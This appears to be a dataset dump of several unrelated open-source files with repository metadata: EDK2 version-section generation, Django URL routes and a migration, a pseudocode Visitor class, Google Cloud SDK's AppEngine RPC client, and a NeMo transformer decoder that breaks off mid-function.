self.definitions = [u'a white substance used in stomach medicines']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
]
| |
34b0a3903fbab558986e74b115ebb5bf14cae7a3 | 7c857119fe1505b1d80d6e62969661c06dc1a2f4 | /BaseTools/Source/Python/GenFds/VerSection.py | 7280e80cb4ef7ce47524af2de67a3c2e84cf5a33 | [
"BSD-2-Clause"
]
| permissive | CloverHackyColor/CloverBootloader | 7042ca7dd6b513d22be591a295e49071ae1482ee | 2711170df4f60b2ae5aa20add3e00f35cf57b7e5 | refs/heads/master | 2023-08-30T22:14:34.590134 | 2023-08-27T19:14:02 | 2023-08-27T19:14:02 | 205,810,121 | 4,734 | 770 | BSD-2-Clause | 2023-09-03T12:41:33 | 2019-09-02T08:22:14 | C | UTF-8 | Python | false | false | 2,917 | py | ## @file
# process Version section generation
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import absolute_import
from .Ffs import SectionSuffix
import Common.LongFilePathOs as os
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from CommonDataClass.FdfClass import VerSectionClassObject
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.DataType import SUP_MODULE_SEC
## generate version section
#
#
class VerSection (VerSectionClassObject):
    ## The constructor
    #
    #   @param  self        The object pointer
    #
    def __init__(self):
        VerSectionClassObject.__init__(self)

    ## GenSection() method
    #
    #   Generate version section
    #
    #   @param  self        The object pointer
    #   @param  OutputPath  Where to place output file
    #   @param  ModuleName  Which module this section belongs to
    #   @param  SecNum      Index of section
    #   @param  KeyStringList  Filter for inputs of section generation
    #   @param  FfsInf      FfsInfStatement object that contains this section data
    #   @param  Dict        dictionary contains macro and its value
    #   @retval tuple       (Generated file name, section alignment)
    #
    def GenSection(self, OutputPath, ModuleName, SecNum, KeyStringList, FfsInf=None, Dict=None, IsMakefile = False):
        #
        # Prepare the parameter of GenSection
        #
        if FfsInf:
            self.Alignment = FfsInf.__ExtendMacro__(self.Alignment)
            self.BuildNum = FfsInf.__ExtendMacro__(self.BuildNum)
            self.StringData = FfsInf.__ExtendMacro__(self.StringData)
            self.FileName = FfsInf.__ExtendMacro__(self.FileName)

        OutputFile = os.path.join(OutputPath,
                                  ModuleName + SUP_MODULE_SEC + SecNum + SectionSuffix.get('VERSION'))
        OutputFile = os.path.normpath(OutputFile)

        # Get String Data: an explicit string wins over a file reference.
        StringData = ''
        if self.StringData:
            StringData = self.StringData
        elif self.FileName:
            if Dict is None:
                Dict = {}
            FileNameStr = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FileName)
            FileNameStr = GenFdsGlobalVariable.MacroExtend(FileNameStr, Dict)
            # Bug fix: use a context manager so the file handle is released
            # even if read() raises (the original leaked it on error).
            with open(FileNameStr, 'r') as FileObj:
                StringData = FileObj.read()
            StringData = '"' + StringData + '"'

        GenFdsGlobalVariable.GenerateSection(OutputFile, [], 'EFI_SECTION_VERSION',
                                             Ver=StringData, BuildNumber=self.BuildNum, IsMakefile=IsMakefile)
        OutputFileList = []
        OutputFileList.append(OutputFile)
        return OutputFileList, self.Alignment
| [
"[email protected]"
]
| |
b197dbe5eb039338439bb8c6b3e6fb20f0f80e18 | db1247a3999e3f22db025639d09a605082ded89d | /grid/urls.py | 4da7303e5324e7da6e0f39e3e8d1faa61df9ca6a | [
"MIT"
]
| permissive | wise-team/hiveprojects.io | 1614deb0e4df5fe19cf62dbdb4d8d2741173c6b0 | 96e15a53f02c7327fe982a06b2dce56cd130e38c | refs/heads/master | 2022-12-12T18:44:35.221892 | 2020-03-27T21:50:03 | 2020-03-27T21:50:03 | 248,597,914 | 5 | 1 | MIT | 2022-11-22T01:59:55 | 2020-03-19T20:24:59 | Python | UTF-8 | Python | false | false | 2,093 | py | """grid url patterns"""
from django.conf.urls import url
from grid import views
from grid.views import (
add_feature,
add_grid,
add_grid_package,
add_new_grid_package,
ajax_grid_list,
delete_feature,
delete_grid_package,
edit_element,
edit_grid,
edit_feature,
grid_detail,
grids
)
# URL routes for the grid app; order and regexes are unchanged.
urlpatterns = [
    # Grid CRUD.
    url(regex='^add/$', view=add_grid, name='add_grid'),
    url(regex='^(?P<slug>[-\w]+)/edit/$', view=edit_grid, name='edit_grid'),
    # Grid elements (feature x package cells).
    url(regex='^element/(?P<feature_id>\d+)/(?P<package_id>\d+)/$', view=edit_element, name='edit_element'),
    # Features.
    url(regex='^feature/add/(?P<grid_slug>[a-z0-9\-\_]+)/$', view=add_feature, name='add_feature'),
    url(regex='^feature/(?P<id>\d+)/$', view=edit_feature, name='edit_feature'),
    url(regex='^feature/(?P<id>\d+)/delete/$', view=delete_feature, name='delete_feature'),
    # Grid packages.
    url(regex='^package/(?P<id>\d+)/delete/$', view=delete_grid_package, name='delete_grid_package'),
    url(regex='^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/$', view=add_grid_package, name='add_grid_package'),
    url(regex='^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/new$', view=add_new_grid_package, name='add_new_grid_package'),
    # Listings and detail pages.
    url(regex='^ajax_grid_list/$', view=ajax_grid_list, name='ajax_grid_list'),
    url(regex='^$', view=grids, name='grids'),
    url(regex='^g/(?P<slug>[-\w]+)/$', view=grid_detail, name='grid'),
    url(regex='^g/(?P<slug>[-\w]+)/landscape/$', view=views.grid_detail_landscape, name='grid_landscape'),
    url(regex='^g/(?P<slug>[-\w]+)/timesheet/$', view=views.grid_timesheet, name='grid_timesheet'),
]
| [
"[email protected]"
]
| |
c5ad1b5d232b6458e70b9d7459d2978fcf989724 | 1bde114a847c629701e3acd004be5788594e0ef1 | /Examples/PatternRefactoring/trashvisitor/Visitor.py | 29bc5089c2ffa37d3322ce93d7a97ca546f4a1f4 | []
| no_license | BruceEckel/ThinkingInPython | 0b234cad088ee144bb8511e1e7db9fd5bba78877 | 76a1310deaa51e02e9f83ab74520b8269aac6fff | refs/heads/master | 2022-02-21T23:01:40.544505 | 2022-02-08T22:26:52 | 2022-02-08T22:26:52 | 97,673,620 | 106 | 33 | null | 2022-02-08T22:26:53 | 2017-07-19T04:43:50 | Python | UTF-8 | Python | false | false | 215 | py | # PatternRefactoring/trashvisitor/Visitor.py
# The base class for visitors.
# NOTE(review): this is Java-style pseudocode transliterated from the book's
# "Thinking in Patterns" example; the ``visit(self, Aluminum a)`` parameter
# syntax is not valid Python and the method bodies are omitted, so this module
# is illustrative only and cannot be imported or executed as-is.
class Visitor:
    # One ``visit`` overload per concrete Trash type (overloading itself is a
    # Java idiom; Python would dispatch on the argument's type instead).
    def visit(self, Aluminum a)
    def visit(self, Paper p)
    def visit(self, Glass g)
    def visit(self, Cardboard c)
| [
"[email protected]"
]
| |
d8efecb43d9198e3dd2221f4e39fb241646378fc | 0032d988541e85c47b5034c20ecf88220dde5a95 | /openbook_posts/migrations/0026_auto_20190414_1620.py | 242d6b7b2f6ad2429773288abeaee56f0fb9ccf8 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | OkunaOrg/okuna-api | eabd37fef9d2be59b590ed8d72bee084ac377997 | f87d8e80d2f182c01dbce68155ded0078ee707e4 | refs/heads/master | 2022-02-04T21:31:10.577601 | 2021-12-28T18:20:39 | 2021-12-28T18:20:39 | 151,052,951 | 185 | 92 | MIT | 2022-01-13T01:00:40 | 2018-10-01T07:44:46 | Python | UTF-8 | Python | false | false | 444 | py | # Generated by Django 2.2 on 2019-04-14 14:20
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
    """Make ``Post.uuid`` a unique, indexed, non-editable UUID field.

    Auto-generated by Django 2.2; the field keeps its ``uuid.uuid4`` default
    and gains ``db_index=True`` and ``unique=True`` so posts can be looked up
    by UUID efficiently and collisions are rejected at the database level.
    """

    dependencies = [
        ('openbook_posts', '0025_post_is_edited'),
    ]

    operations = [
        migrations.AlterField(
            model_name='post',
            name='uuid',
            field=models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True),
        ),
    ]
| [
"[email protected]"
]
| |
b613607484ff4991e3b7a52462661a1989ffd82b | 9b41bd4d829b7b4b5fc7ea2f375089793f34beb0 | /lib/googlecloudsdk/api_lib/app/appengine_client.py | baa0ff95581004e5a3dbd6f42446a6baadea863d | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
]
| permissive | eyalev/gcloud | 20a596f9cbf7873eaea652a0b2ad080678f1598c | 421ee63a0a6d90a097e8530d53a6df5b905a0205 | refs/heads/master | 2020-12-25T14:48:11.142544 | 2016-06-22T08:43:20 | 2016-06-22T08:43:20 | 61,703,392 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 18,561 | py | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module used by gcloud to communicate with appengine services."""
from __future__ import with_statement
import urllib2
from googlecloudsdk.api_lib.app import logs_requestor
from googlecloudsdk.api_lib.app import util
from googlecloudsdk.api_lib.app import yaml_parsing
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.credentials import devshell as c_devshell
from googlecloudsdk.core.credentials import http
from googlecloudsdk.core.credentials import service_account as c_service_account
from googlecloudsdk.core.credentials import store as c_store
from googlecloudsdk.third_party.appengine.datastore import datastore_index
from googlecloudsdk.third_party.appengine.tools import appengine_rpc_httplib2
from oauth2client.contrib import gce as oauth2client_gce
import yaml
# OAuth2 scopes requested for all appcfg-style RPCs issued by this module.
APPCFG_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']

# Parameters for reading from the GCE metadata service.
METADATA_BASE = 'http://metadata.google.internal'
SERVICE_ACCOUNT_BASE = ('computeMetadata/v1/instance/service-accounts/default')

# RPC server implementation used for every request (OAuth2 over httplib2).
RpcServerClass = appengine_rpc_httplib2.HttpRpcServerOAuth2  # pylint: disable=invalid-name
class Error(exceptions.Error):
  """Root of the exception hierarchy raised by this module."""
class UnknownConfigType(Error):
  """Raised when asked to update a config type this module does not recognize."""
class AppengineClient(object):
  """Client used by gcloud to communicate with appengine services.

  NOTE(review): this module is Python 2 code (``except E, e:`` syntax and
  tuple-parameter unpacking below); it is not runnable under Python 3 as-is.

  Attributes:
    server: The appengine server to which requests are sent.
    project: The appengine application in use.
    oauth2_access_token: An existing OAuth2 access token to use.
    oauth2_refresh_token: An existing OAuth2 refresh token to use.
    authenticate_service_account: Authenticate using the default service account
      for the Google Compute Engine VM in which gcloud is being called.
    ignore_bad_certs: Whether to ignore certificate errors when talking to the
      server.
  """

  def __init__(self, server=None, ignore_bad_certs=False):
    self.server = server or 'appengine.google.com'
    self.project = properties.VALUES.core.project.Get(required=True)
    self.ignore_bad_certs = ignore_bad_certs
    # Auth related options
    self.oauth2_access_token = None
    self.oauth2_refresh_token = None
    self.oauth_scopes = APPCFG_SCOPES
    self.authenticate_service_account = False
    self.client_id = None
    self.client_secret = None
    account = properties.VALUES.core.account.Get()
    # This statement will raise a c_store.Error if there is a problem
    # fetching credentials.
    credentials = c_store.Load(account=account)
    # Pick an auth strategy from the concrete credential type that the gcloud
    # credential store returned: service account / Cloud Shell / GCE metadata
    # service / stored user refresh token.
    if isinstance(credentials, c_service_account.ServiceAccountCredentials):
      self.oauth2_access_token = credentials.access_token
      self.client_id = credentials.client_id
      self.client_secret = credentials.client_secret
    elif isinstance(credentials, c_devshell.DevshellCredentials):
      # TODO(user): This passes the access token to use for API calls to
      # appcfg which means that commands that are longer than the lifetime
      # of the access token may fail - e.g. some long deployments.  The proper
      # solution is to integrate appcfg closer with the Cloud SDK libraries,
      # this code will go away then and the standard credentials flow will be
      # used.
      self.oauth2_access_token = credentials.access_token
      self.client_id = None
      self.client_secret = None
    elif isinstance(credentials, oauth2client_gce.AppAssertionCredentials):
      # If we are on GCE, use the service account
      self.authenticate_service_account = True
      self.client_id = None
      self.client_secret = None
    else:
      # Otherwise use a stored refresh token
      self.oauth2_refresh_token = credentials.refresh_token
      self.client_id = credentials.client_id
      self.client_secret = credentials.client_secret

  def CleanupIndexes(self, index_yaml):
    """Removes unused datastore indexes.

    Diffs the given definitions against the server's, interactively asks the
    user which no-longer-defined indexes to delete, then deletes the confirmed
    ones and warns about any the server could not delete.

    Args:
      index_yaml: The parsed yaml file with index data.
    """
    rpcserver = self._GetRpcServer()
    response = rpcserver.Send('/api/datastore/index/diff',
                              app_id=self.project, payload=index_yaml.ToYAML())
    unused_new_indexes, notused_indexes = (
        datastore_index.ParseMultipleIndexDefinitions(response))
    # Get confirmation from user which indexes should be deleted.
    deletions = datastore_index.IndexDefinitions(indexes=[])
    if notused_indexes.indexes:
      for index in notused_indexes.indexes:
        msg = ('This index is no longer defined in your index.yaml file.\n{0}'
               .format(str(index.ToYAML())))
        prompt = 'Do you want to delete this index'
        if console_io.PromptContinue(msg, prompt, default=True):
          deletions.indexes.append(index)
    # Do deletions of confirmed indexes.
    if deletions.indexes:
      response = rpcserver.Send('/api/datastore/index/delete',
                                app_id=self.project, payload=deletions.ToYAML())
      not_deleted = datastore_index.ParseIndexDefinitions(response)
      # Notify the user when indexes are not deleted.
      if not_deleted.indexes:
        not_deleted_count = len(not_deleted.indexes)
        if not_deleted_count == 1:
          warning_message = ('An index was not deleted. Most likely this is '
                             'because it no longer exists.\n\n')
        else:
          warning_message = ('%d indexes were not deleted. Most likely this '
                             'is because they no longer exist.\n\n'
                             % not_deleted_count)
        for index in not_deleted.indexes:
          warning_message += index.ToYAML()
        log.warning(warning_message)

  def GetLogs(self, service, version, severity, vhost, include_vhost,
              include_all, num_days, end_date, output_file):
    """Get application logs for the given version of the service.

    Args:
      service: str, The service of the app to fetch logs from.
      version: str, The version of the app to fetch logs for.
      severity: int, App log severity to request (0-4); None for request logs
        only.
      vhost: str, The virtual host of log messages to get. None for all hosts.
      include_vhost: bool, If true, the virtual host is included in log
        messages.
      include_all: bool, If true, we add to the log message everything we know
        about the request.
      num_days: int, Number of days worth of logs to export; 0 for all
        available.
      end_date: datetime.date, Date object representing last day of logs to
        return.  If None, today is used.
      output_file: Output file name or '-' for standard output.
    """
    rpcserver = self._GetRpcServer()
    requestor = logs_requestor.LogsRequester(
        rpcserver, self.project, service, version, severity, vhost,
        include_vhost, include_all)
    requestor.DownloadLogs(num_days, end_date, output_file)

  def GetLogsAppend(self, service, version, severity, vhost, include_vhost,
                    include_all, end_date, output_file):
    """Get application logs and append them to an existing file.

    Args:
      service: str, The service of the app to fetch logs from.
      version: str, The version of the app to fetch logs for.
      severity: int, App log severity to request (0-4); None for request logs
        only.
      vhost: str, The virtual host of log messages to get. None for all hosts.
      include_vhost: bool, If true, the virtual host is included in log
        messages.
      include_all: bool, If true, we add to the log message everything we know
        about the request.
      end_date: datetime.date, Date object representing last day of logs to
        return.  If None, today is used.
      output_file: Output file name or '-' for standard output.
    """
    rpcserver = self._GetRpcServer()
    requestor = logs_requestor.LogsRequester(
        rpcserver, self.project, service, version, severity, vhost,
        include_vhost, include_all)
    requestor.DownloadLogsAppend(end_date, output_file)

  def PrepareVmRuntime(self):
    """Prepare the application for vm runtimes and return state."""
    # More timeout retries than usual: preparation can be slow server-side.
    rpcserver = self._GetRpcServer(timeout_max_errors=5)
    rpcserver.Send('/api/vms/prepare', app_id=self.project)

  # TODO(b/29059251): vm_name and instance id are different, this API client
  # needs the VM name.  The Zeus API will use instance id instead.
  def SetManagedByGoogle(self, service, version, vm_name=None, wait=True):
    """Sets a service version (and optionally an instance) to Google managed.

    This will reboot the machine and restore the instance with a fresh runtime.

    Args:
      service: str, The service to update.
      version: str, The version of the service to update.
      vm_name: str, The vm name of the instance to update.
      wait: bool, True to wait until it takes effect.
    """
    self._SetManagedBy(service, version, vm_name, '/api/vms/lock', wait)

  def SetManagedBySelf(self, service, version, vm_name=None, wait=True):
    """Sets a service version (optionally a single instance) as self managed.

    This is the 'break the glass' mode that lets you ssh into the machine and
    debug.

    Args:
      service: str, The service to update.
      version: str, The version of the service to update.
      vm_name: str, The vm name of the instance to update.
      wait: bool, True to wait until it takes effect.
    """
    self._SetManagedBy(service, version, vm_name, '/api/vms/debug', wait)

  def _SetManagedBy(self, service, version, vm_name, url, wait):
    """Switches a service version between management modes.

    Args:
      service: str, The service to update.
      version: str, The version of the service to update.
      vm_name: str, The vm name of the instance to update.
      url: str, The URL of the API to call to make the update.
      wait: bool, True to wait until it takes effect.

    Raises:
      Error: if changing the instance debug state failed.
    """
    rpcserver = self._GetRpcServer()
    kwargs = {'app_id': self.project,
              'version_match': version,
              'module': service}
    if vm_name:
      kwargs['instance'] = vm_name
    rpcserver.Send(url, **kwargs)
    if wait:
      # Poll the debug-state endpoint with exponential backoff until it
      # leaves PENDING.
      def GetState():
        yaml_data = rpcserver.Send(
            '/api/vms/debugstate', app_id=self.project, version_match=version,
            module=service)
        state = yaml.safe_load(yaml_data)
        done = state['state'] != 'PENDING'
        return (done, (state['state'], state['message']))

      # NOTE(review): tuple-parameter unpacking below is Python 2-only syntax.
      def PrintRetryMessage((unused_state, msg), delay):
        log.status.Print('{0}. Will try again in {1} seconds.'
                         .format(msg, delay))

      _, (state, message) = util.RetryWithBackoff(
          GetState, PrintRetryMessage, initial_delay=1, backoff_factor=2,
          max_delay=5, max_tries=20)
      if state == 'ERROR':
        raise Error(message)

  def StartService(self, service, version):
    """Starts serving a the given version of the service.

    This only works if scaling is set to manual.

    Args:
      service: str, The service to start.
      version: str, The version of the service to start.
    """
    self._GetRpcServer().Send('/api/modules/start', app_id=self.project,
                              module=service, version=version)

  def StopService(self, service, version):
    """Stop serving a the given version of the service.

    This only works if scaling is set to manual.

    Args:
      service: str, The service to stop.
      version: str, The version of the service to stop.
    """
    self._GetRpcServer().Send('/api/modules/stop', app_id=self.project,
                              module=service, version=version)

  def UpdateConfig(self, config_name, parsed_yaml):
    """Updates any of the supported config file types.

    Dispatches to the matching Update* method below based on config_name.

    Args:
      config_name: str, The name of the config to deploy.
      parsed_yaml: The parsed object corresponding to that config type.

    Raises:
      UnknownConfigType: If config_name is not a value config type.

    Returns:
      Whatever the underlying update methods return.
    """
    if config_name == yaml_parsing.ConfigYamlInfo.CRON:
      return self.UpdateCron(parsed_yaml)
    if config_name == yaml_parsing.ConfigYamlInfo.DISPATCH:
      return self.UpdateDispatch(parsed_yaml)
    if config_name == yaml_parsing.ConfigYamlInfo.DOS:
      return self.UpdateDos(parsed_yaml)
    if config_name == yaml_parsing.ConfigYamlInfo.INDEX:
      return self.UpdateIndexes(parsed_yaml)
    if config_name == yaml_parsing.ConfigYamlInfo.QUEUE:
      return self.UpdateQueues(parsed_yaml)
    raise UnknownConfigType(
        'Config type [{0}] is not a known config type'.format(config_name))

  def UpdateCron(self, cron_yaml):
    """Updates any new or changed cron definitions.

    Args:
      cron_yaml: The parsed yaml file with cron data.
    """
    self._GetRpcServer().Send('/api/cron/update',
                              app_id=self.project, payload=cron_yaml.ToYAML())

  def UpdateDispatch(self, dispatch_yaml):
    """Updates new or changed dispatch definitions.

    Args:
      dispatch_yaml: The parsed yaml file with dispatch data.
    """
    self._GetRpcServer().Send('/api/dispatch/update',
                              app_id=self.project,
                              payload=dispatch_yaml.ToYAML())

  def UpdateDos(self, dos_yaml):
    """Updates any new or changed dos definitions.

    Args:
      dos_yaml: The parsed yaml file with dos data.
    """
    self._GetRpcServer().Send('/api/dos/update',
                              app_id=self.project, payload=dos_yaml.ToYAML())

  def UpdateIndexes(self, index_yaml):
    """Updates indexes.

    Args:
      index_yaml: The parsed yaml file with index data.
    """
    self._GetRpcServer().Send('/api/datastore/index/add',
                              app_id=self.project, payload=index_yaml.ToYAML())

  def UpdateQueues(self, queue_yaml):
    """Updates any new or changed task queue definitions.

    Args:
      queue_yaml: The parsed yaml file with queue data.
    """
    self._GetRpcServer().Send('/api/queue/update',
                              app_id=self.project, payload=queue_yaml.ToYAML())

  def _GetRpcServer(self, timeout_max_errors=2):
    """Returns an instance of an AbstractRpcServer.

    Args:
      timeout_max_errors: How many timeout errors to retry.
    Returns:
      A new AbstractRpcServer, on which RPC calls can be made.
    """
    log.debug('Host: {0}'.format(self.server))

    if self._IsGceEnvironment():
      credentials = oauth2client_gce.AppAssertionCredentials()
    else:
      credentials = None

    # In this case, the get_user_credentials parameters to the RPC server
    # constructor is actually an OAuth2Parameters.
    get_user_credentials = (
        appengine_rpc_httplib2.HttpRpcServerOAuth2.OAuth2Parameters(
            access_token=self.oauth2_access_token,
            client_id=self.client_id,
            client_secret=self.client_secret,
            scope=APPCFG_SCOPES,
            refresh_token=self.oauth2_refresh_token,
            credential_file=None,
            token_uri=None,
            credentials=credentials))
    # Also set gflags flag... this is a bit of a hack.
    if hasattr(appengine_rpc_httplib2.tools, 'FLAGS'):
      appengine_rpc_httplib2.tools.FLAGS.auth_local_webserver = True

    server = RpcServerClass(
        self.server,
        get_user_credentials,
        util.GetUserAgent(),
        util.GetSourceName(),
        host_override=None,
        save_cookies=True,
        auth_tries=3,
        timeout_max_errors=timeout_max_errors,
        account_type='HOSTED_OR_GOOGLE',
        secure=True,
        ignore_certs=self.ignore_bad_certs,
        http_object=http.Http())
    # TODO(user) Hack to avoid failure due to missing cacerts.txt resource.
    server.certpath = None
    # Don't use a cert file if the user passed ignore-bad-certs.
    server.cert_file_available = not self.ignore_bad_certs
    return util.RPCServer(server)

  def _IsGceEnvironment(self):
    """Determine if we are running in a GCE environment.

    Returns:
      True if we are running in a GCE environment.

    Raises:
      Error: The user has requested authentication for a service account but the
      environment is not correct for that to work.
    """
    if self.authenticate_service_account:
      # Avoid hard-to-understand errors later by checking that we have a
      # metadata service (so we are in a GCE VM) and that the VM is configured
      # with access to the appengine.admin scope.
      url = '%s/%s/scopes' % (METADATA_BASE, SERVICE_ACCOUNT_BASE)
      try:
        req = urllib2.Request(url, headers={'Metadata-Flavor': 'Google'})
        vm_scopes_string = urllib2.urlopen(req).read()
      # NOTE(review): ``except E, e`` is Python 2-only except syntax.
      except urllib2.URLError, e:
        raise Error(
            'Could not obtain scope list from metadata service: %s: %s. This '
            'may be because we are not running in a Google Compute Engine VM.' %
            (url, e))
      vm_scopes = vm_scopes_string.split()
      missing = list(set(self.oauth_scopes).difference(vm_scopes))
      if missing:
        raise Error(
            'You are currently logged into gcloud using a service account '
            'which does not have the appropriate access to [{0}]. The account '
            'has the following scopes: [{1}]. It needs [{2}] in order to '
            'succeed.\nPlease recreate this VM instance with the missing '
            'scopes. You may also log into a standard account that has the '
            'appropriate access by using `gcloud auth login`.'
            .format(self.project, ', '.join(vm_scopes), ', '.join(missing)))
      return True
    else:
      return False
| [
"[email protected]"
]
| |
a9194341e115335348649466389655b10bc7ccd4 | caa05194b8f11f29a19767c94fdc93628be694d5 | /nemo/collections/nlp/modules/common/transformer/transformer_decoders.py | 910a7104ea24d2870a596d91e46359933d887e99 | [
"Apache-2.0"
]
| permissive | Jimmy-INL/NeMo | a589ab0ab97b9ccb8921579670e80c470ce7077b | 6a3753b3013dc92a3587853d60c5086e2e64d98f | refs/heads/main | 2023-04-02T22:28:29.891050 | 2021-04-13T18:22:24 | 2021-04-13T18:22:24 | 357,681,603 | 1 | 0 | Apache-2.0 | 2021-04-13T20:34:12 | 2021-04-13T20:34:12 | null | UTF-8 | Python | false | false | 8,169 | py | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from dataclasses import dataclass
import torch
import torch.nn as nn
from omegaconf.omegaconf import MISSING
from nemo.collections.common.parts import form_attention_mask
from nemo.collections.nlp.modules.common.transformer.transformer_modules import MultiHeadAttention, PositionWiseFF
__all__ = ["TransformerDecoder"]
class TransformerDecoderBlock(nn.Module):
    """
    Building block of Transformer decoder.

    Args:
        hidden_size: size of the embeddings in the model, also known as d_model
        inner_size: number of neurons in the intermediate part of feed-forward
            net, usually is (4-8 x hidden_size) in the papers
        num_attention_heads: number of heads in multi-head attention
        attn_score_dropout: probability of dropout applied to attention scores
        attn_layer_dropout: probability of dropout applied to the output of the
            attention layers, but before layer normalization
        ffn_dropout: probability of dropout applied to FFN output
        hidden_act: activation function used between two linear layers in FFN
        pre_ln: if True, apply LayerNorm before each sub-layer (Pre-LN);
            otherwise after the residual connection (Post-LN, the original
            Transformer ordering)
    """

    def __init__(
        self,
        hidden_size: int,
        inner_size: int,
        num_attention_heads: int = 1,
        attn_score_dropout: float = 0.0,
        attn_layer_dropout: float = 0.0,
        ffn_dropout: float = 0.0,
        hidden_act: str = "relu",
        pre_ln: bool = False,
    ):
        super().__init__()
        self.pre_ln = pre_ln
        # Sub-layer 1: masked self-attention over the decoder states.
        self.layer_norm_1 = nn.LayerNorm(hidden_size, eps=1e-5)
        self.first_sub_layer = MultiHeadAttention(
            hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
        )
        # Sub-layer 2: cross-attention from decoder states to encoder states.
        self.layer_norm_2 = nn.LayerNorm(hidden_size, eps=1e-5)
        self.second_sub_layer = MultiHeadAttention(
            hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
        )
        # Sub-layer 3: position-wise feed-forward network.
        self.layer_norm_3 = nn.LayerNorm(hidden_size, eps=1e-5)
        self.third_sub_layer = PositionWiseFF(hidden_size, inner_size, ffn_dropout, hidden_act)

    def forward_preln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
        """
        Pre-LayerNorm block
        Order of operations: LN -> Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN
        """
        residual = decoder_query
        # Note: query and keys are normalized with the same LayerNorm instance.
        decoder_query = self.layer_norm_1(decoder_query)
        decoder_keys = self.layer_norm_1(decoder_keys)
        self_attn_output = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask)
        self_attn_output += residual

        residual = self_attn_output
        self_attn_output = self.layer_norm_2(self_attn_output)
        enc_dec_attn_output = self.second_sub_layer(self_attn_output, encoder_states, encoder_states, encoder_mask)
        enc_dec_attn_output += residual

        residual = enc_dec_attn_output
        enc_dec_attn_output = self.layer_norm_3(enc_dec_attn_output)
        output_states = self.third_sub_layer(enc_dec_attn_output)
        output_states += residual
        return output_states

    def forward_postln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
        """
        Post-LayerNorm block
        Order of operations: Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN -> Residual -> LN
        """
        self_attn_output = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask)
        self_attn_output += decoder_query
        self_attn_output = self.layer_norm_1(self_attn_output)

        enc_dec_attn_output = self.second_sub_layer(self_attn_output, encoder_states, encoder_states, encoder_mask)
        enc_dec_attn_output += self_attn_output
        enc_dec_attn_output = self.layer_norm_2(enc_dec_attn_output)

        output_states = self.third_sub_layer(enc_dec_attn_output)
        output_states += enc_dec_attn_output
        return self.layer_norm_3(output_states)

    def forward(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
        """Dispatch to the Pre-LN or Post-LN variant based on ``self.pre_ln``."""
        if self.pre_ln:
            return self.forward_preln(decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask)
        else:
            return self.forward_postln(decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask)
class TransformerDecoder(nn.Module):
def __init__(
self,
num_layers: int,
hidden_size: int,
inner_size: int,
num_attention_heads: int = 1,
attn_score_dropout: float = 0.0,
attn_layer_dropout: float = 0.0,
ffn_dropout: float = 0.0,
hidden_act: str = "relu",
pre_ln: bool = False,
):
super().__init__()
layer = TransformerDecoderBlock(
hidden_size,
inner_size,
num_attention_heads,
attn_score_dropout,
attn_layer_dropout,
ffn_dropout,
hidden_act,
pre_ln,
)
self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])
self.diagonal = 0
def _get_memory_states(self, decoder_states, decoder_mems_list=None, i=0):
if decoder_mems_list is not None:
memory_states = torch.cat((decoder_mems_list[i], decoder_states), dim=1)
else:
memory_states = decoder_states
return memory_states
def forward(
self, decoder_states, decoder_mask, encoder_states, encoder_mask, decoder_mems_list=None, return_mems=False
):
"""
Args:
decoder_states: output of the embedding layer (B x L_dec x H)
decoder_mask: decoder inputs mask (B x L_dec)
encoder_states: output of the encoder (B x L_enc x H)
encoder_mask: encoder inputs mask (B x L_enc)
decoder_mems_list: list of the cached decoder hidden states
for fast autoregressive generation which will be used instead
of decoder_states as keys and values if not None
return_mems: bool, whether to return outputs of all decoder layers
or the last layer only
"""
decoder_attn_mask = form_attention_mask(decoder_mask, diagonal=self.diagonal)
encoder_attn_mask = form_attention_mask(encoder_mask)
memory_states = self._get_memory_states(decoder_states, decoder_mems_list, 0)
cached_mems_list = [memory_states]
for i, layer in enumerate(self.layers):
decoder_states = layer(decoder_states, decoder_attn_mask, memory_states, encoder_states, encoder_attn_mask)
memory_states = self._get_memory_states(decoder_states, decoder_mems_list, i + 1)
